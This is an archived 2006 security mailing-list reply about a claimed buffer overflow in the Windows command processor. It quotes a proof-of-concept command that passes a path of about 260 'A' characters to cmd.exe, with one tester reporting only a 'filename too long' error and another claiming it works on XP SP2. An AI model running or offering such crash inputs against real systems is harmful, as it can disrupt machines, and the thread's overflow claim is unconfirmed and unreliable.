|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
RE: Windows Command Processor CMD.EXE Buffer Overflow
From: Luis Alberto Cortes Zavala (napasn
securitynation.com)
Date: Fri Oct 20 2006 - 14:33:00 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
YEah! Buffer Overflow Windows XP SP2
I Hill debug this.
Luís Alberto Cortes Zavala
IT / Security Consultant
napasecuritynation.com
http://www.securitynation.com
-----Mensaje original-----
De: listbouncesecurityfocus.com [mailto:listbouncesecurityfocus.com] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-devsecurityfocus.com
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow
> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]